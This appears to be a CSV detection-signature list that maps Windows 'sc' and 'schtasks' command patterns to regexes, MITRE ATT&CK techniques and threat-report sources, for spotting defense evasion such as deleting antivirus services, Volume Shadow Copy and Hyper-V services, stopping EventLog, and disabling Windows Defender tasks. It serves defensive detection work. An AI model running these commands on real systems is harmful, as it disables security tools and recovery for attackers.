"*sc delete ""klmouflt""*",".{0,1000}sc\sdelete\s\""klmouflt\"".{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""klpd""*",".{0,1000}sc\sdelete\s\""klpd\"".{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""kltap""*",".{0,1000}sc\sdelete\s\""kltap\"".{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""KSDE1.0.0""*",".{0,1000}sc\sdelete\s\""KSDE1\.0\.0\"".{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""ntrtscan""*",".{0,1000}sc\sdelete\s\""ntrtscan\"".{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""nvspwmi""*",".{0,1000}sc\sdelete\s\""nvspwmi\"".{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""ofcservice""*",".{0,1000}sc\sdelete\s\""ofcservice\"".{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""storflt""*",".{0,1000}sc\sdelete\s\""storflt\"".{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""TmCCSF""*",".{0,1000}sc\sdelete\s\""TmCCSF\"".{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""TmFilter""*",".{0,1000}sc\sdelete\s\""TmFilter\"".{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""TMiCRCScanService""*",".{0,1000}sc\sdelete\s\""TMiCRCScanService\"".{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""tmlisten""*",".{0,1000}sc\sdelete\s\""tmlisten\"".{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""TMLWCSService""*",".{0,1000}sc\sdelete\s\""TMLWCSService\"".{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""TmPreFilter""*",".{0,1000}sc\sdelete\s\""TmPreFilter\"".{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""TmProxy""*",".{0,1000}sc\sdelete\s\""TmProxy\"".{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""TMSmartRelayService""*",".{0,1000}sc\sdelete\s\""TMSmartRelayService\"".{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""tmusa""*",".{0,1000}sc\sdelete\s\""tmusa\"".{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""vmicguestinterface""*",".{0,1000}sc\sdelete\s\""vmicguestinterface\"".{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""vmicheartbeat""*",".{0,1000}sc\sdelete\s\""vmicheartbeat\"".{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""vmickvpexchange""*",".{0,1000}sc\sdelete\s\""vmickvpexchange\"".{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""vmicrdv""*",".{0,1000}sc\sdelete\s\""vmicrdv\"".{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""vmicshutdown""*",".{0,1000}sc\sdelete\s\""vmicshutdown\"".{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""vmictimesync""*",".{0,1000}sc\sdelete\s\""vmictimesync\"".{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""vmicvss""*",".{0,1000}sc\sdelete\s\""vmicvss\"".{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""VSApiNt""*",".{0,1000}sc\sdelete\s\""VSApiNt\"".{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""wmms""*",".{0,1000}sc\sdelete\s\""wmms\"".{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""WRSVC""*",".{0,1000}sc\sdelete\s\""WRSVC\"".{0,1000}","greyware_tool_keyword","sc","deletes the Webroot service - disabling the antivirus","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete AVP18.0.0*",".{0,1000}sc\sdelete\sAVP18\.0\.0.{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ekrn*",".{0,1000}sc\sdelete\sekrn.{0,1000}","greyware_tool_keyword","sc","deletes the ESET service","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete FirebirdGuardianDefaultInstance*",".{0,1000}sc\sdelete\sFirebirdGuardianDefaultInstance.{0,1000}","greyware_tool_keyword","sc","delete services related to the Firebird database ","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete FirebirdServerDefaultInstance*",".{0,1000}sc\sdelete\sFirebirdServerDefaultInstance.{0,1000}","greyware_tool_keyword","sc","delete services related to the Firebird database ","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete hvdswvc*",".{0,1000}sc\sdelete\shvdswvc.{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete klbackupdisk*",".{0,1000}sc\sdelete\sklbackupdisk.{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete klbackupflt*",".{0,1000}sc\sdelete\sklbackupflt.{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete klflt*",".{0,1000}sc\sdelete\sklflt.{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete klhk*",".{0,1000}sc\sdelete\sklhk.{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete KLIF*",".{0,1000}sc\sdelete\sKLIF.{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete klim6*",".{0,1000}sc\sdelete\sklim6.{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete klkbdflt*",".{0,1000}sc\sdelete\sklkbdflt.{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete klmouflt*",".{0,1000}sc\sdelete\sklmouflt.{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete klpd*",".{0,1000}sc\sdelete\sklpd.{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete kltap*",".{0,1000}sc\sdelete\skltap.{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete KSDE1.0.0*",".{0,1000}sc\sdelete\sKSDE1\.0\.0.{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete MBAMProtection*",".{0,1000}sc\sdelete\sMBAMProtection.{0,1000}","greyware_tool_keyword","sc","stop AV script","T1562.001 - T1489","TA0005 - TA0007","N/A","Snatch","Defense Evasion","https://thedfirreport.com/wp-content/uploads/2023/12/19208-013.png","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete MBAMService*",".{0,1000}sc\sdelete\sMBAMService.{0,1000}","greyware_tool_keyword","sc","stop AV script","T1562.001 - T1489","TA0005 - TA0007","N/A","Snatch","Defense Evasion","https://thedfirreport.com/wp-content/uploads/2023/12/19208-013.png","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ntrtscan*",".{0,1000}sc\sdelete\sntrtscan.{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete nvspwmi*",".{0,1000}sc\sdelete\snvspwmi.{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ofcservice*",".{0,1000}sc\sdelete\sofcservice.{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete storflt*",".{0,1000}sc\sdelete\sstorflt.{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete TmCCSF*",".{0,1000}sc\sdelete\sTmCCSF.{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete TmFilter*",".{0,1000}sc\sdelete\sTmFilter.{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete TMiCRCScanService*",".{0,1000}sc\sdelete\sTMiCRCScanService.{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete tmlisten*",".{0,1000}sc\sdelete\stmlisten.{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete TMLWCSService*",".{0,1000}sc\sdelete\sTMLWCSService.{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete TmPreFilter*",".{0,1000}sc\sdelete\sTmPreFilter.{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete TmProxy*",".{0,1000}sc\sdelete\sTmProxy.{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete TMSmartRelayService*",".{0,1000}sc\sdelete\sTMSmartRelayService.{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete tmusa*",".{0,1000}sc\sdelete\stmusa.{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete vmicguestinterface*",".{0,1000}sc\sdelete\svmicguestinterface.{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete vmicheartbeat*",".{0,1000}sc\sdelete\svmicheartbeat.{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete vmickvpexchange*",".{0,1000}sc\sdelete\svmickvpexchange.{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete vmicrdv*",".{0,1000}sc\sdelete\svmicrdv.{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete vmicshutdown*",".{0,1000}sc\sdelete\svmicshutdown.{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete vmictimesync*",".{0,1000}sc\sdelete\svmictimesync.{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete vmicvss*",".{0,1000}sc\sdelete\svmicvss.{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete VSApiNt*",".{0,1000}sc\sdelete\sVSApiNt.{0,1000}","greyware_tool_keyword","sc","delete Trend Micro services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete VSS*",".{0,1000}sc\sdelete\sVSS.{0,1000}","greyware_tool_keyword","sc","deleting the Volume Shadow Copy Service","T1490 - T1070.004 - T1562.002","TA0005 - TA0040","N/A","Snatch","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete wmms*",".{0,1000}sc\sdelete\swmms.{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete WRSVC*",".{0,1000}sc\sdelete\sWRSVC.{0,1000}","greyware_tool_keyword","sc","deletes the Webroot service - disabling the antivirus","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc qtriggerinfo RemoteRegistry*",".{0,1000}sc\sqtriggerinfo\sRemoteRegistry.{0,1000}","greyware_tool_keyword","sc","start the RemoteRegistry service without Admin privileges","T1569.002","TA0004 ","N/A","Snatch","Defense Evasion","https://twitter.com/splinter_code/status/1715876413474025704","1","0","N/A","N/A","8","8","N/A","N/A","N/A","N/A"
"*sc start RemoteRegistry*",".{0,1000}sc\sstart\sRemoteRegistry.{0,1000}","greyware_tool_keyword","sc","start the RemoteRegistry service without Admin privileges","T1569.002","TA0004 ","N/A","Snatch","Defense Evasion","https://twitter.com/splinter_code/status/1715876413474025704","1","0","N/A","N/A","8","8","N/A","N/A","N/A","N/A"
"*sc stop eventlog*",".{0,1000}sc\sstop\seventlog.{0,1000}","greyware_tool_keyword","sc","Stop EventLog service","T1489","TA0005","N/A","Snatch","Defense Evasion","https://www.virustotal.com/gui/file/00820a1f0972678cfe7885bc989ab3e5602b0febc96baf9bf3741d56aa374f03/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc stop MBAMProtection*",".{0,1000}sc\sstop\sMBAMProtection.{0,1000}","greyware_tool_keyword","sc","stop AV script","T1562.001 - T1489","TA0005 - TA0007","N/A","Snatch","Defense Evasion","https://thedfirreport.com/wp-content/uploads/2023/12/19208-013.png","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc stop MBAMService*",".{0,1000}sc\sstop\sMBAMService.{0,1000}","greyware_tool_keyword","sc","stop AV script","T1562.001 - T1489","TA0005 - TA0007","N/A","Snatch","Defense Evasion","https://thedfirreport.com/wp-content/uploads/2023/12/19208-013.png","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc stop Sophos File Scanner Service*",".{0,1000}sc\sstop\sSophos\sFile\sScanner\sService.{0,1000}","greyware_tool_keyword","sc","stop AV","T1562.001 - T1489","TA0005 - TA0007","N/A","Snatch","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc.exe stop *Sophos File Scanner Service*",".{0,1000}sc\.exe\sstop\s.{0,1000}Sophos\sFile\sScanner\sService.{0,1000}","greyware_tool_keyword","sc","stop AV","T1562.001 - T1489","TA0005 - TA0007","N/A","Snatch","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc.exe stop bits*",".{0,1000}sc\.exe\sstop\sbits.{0,1000}","greyware_tool_keyword","sc","Stop Bits service","T1489","TA0005","N/A","Snatch","Defense Evasion","https://www.virustotal.com/gui/file/00820a1f0972678cfe7885bc989ab3e5602b0febc96baf9bf3741d56aa374f03/behavior","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*sc.exe stop eventlog*",".{0,1000}sc\.exe\sstop\seventlog.{0,1000}","greyware_tool_keyword","sc","Stop EventLog service","T1489","TA0005","N/A","Snatch","Defense Evasion","https://www.virustotal.com/gui/file/00820a1f0972678cfe7885bc989ab3e5602b0febc96baf9bf3741d56aa374f03/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*schtasks /Change /TN ""Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh"" /Disable*",".{0,1000}schtasks\s\/Change\s\/TN\s\""Microsoft\\Windows\\ExploitGuard\\ExploitGuard\sMDM\spolicy\sRefresh\""\s\/Disable.{0,1000}","greyware_tool_keyword","schtasks","disable scheduled tasks related to Windows Defender","T1562.001","TA0005","N/A","APT3 - Kimsuky - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*schtasks /Change /TN ""Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance"" /Disable*",".{0,1000}schtasks\s\/Change\s\/TN\s\""Microsoft\\Windows\\Windows\sDefender\\Windows\sDefender\sCache\sMaintenance\""\s\/Disable.{0,1000}","greyware_tool_keyword","schtasks","disable scheduled tasks related to Windows Defender","T1562.001","TA0005","N/A","APT3 - Kimsuky - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
